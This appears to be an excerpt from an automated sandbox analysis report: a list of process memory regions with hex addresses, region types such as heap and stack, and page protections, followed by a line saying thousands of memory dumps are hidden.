page read and write
22CBCB63000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAAC3000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
50E2000
heap
page read and write
24ABA898000
heap
page read and write
E5CF000
stack
page read and write
24ABAAC3000
heap
page read and write
1190000
unkown
page read and write
5D5B000
heap
page read and write
22CBC712000
heap
page read and write
5121000
heap
page read and write
24ABAAB4000
heap
page read and write
3390000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCBC3000
heap
page read and write
4670000
heap
page read and write
20E765A0000
heap
page read and write
24ABAACB000
heap
page read and write
DD000
stack
page read and write
8B70000
unkown
page read and write
7FF5D745B000
unkown
page readonly
24ABAB30000
heap
page read and write
24ABA7CC000
heap
page read and write
22CBCBAB000
heap
page read and write
25C0000
trusted library allocation
page read and write
339C000
heap
page read and write
22CBCBD3000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
8F10000
unkown
page read and write
11C0000
unkown
page read and write
8F10000
unkown
page read and write
24ABA801000
heap
page read and write
8F10000
unkown
page read and write
6DC9000
heap
page read and write
41E0000
heap
page read and write
8B70000
unkown
page read and write
There are 5960 hidden memdumps, click here to show them.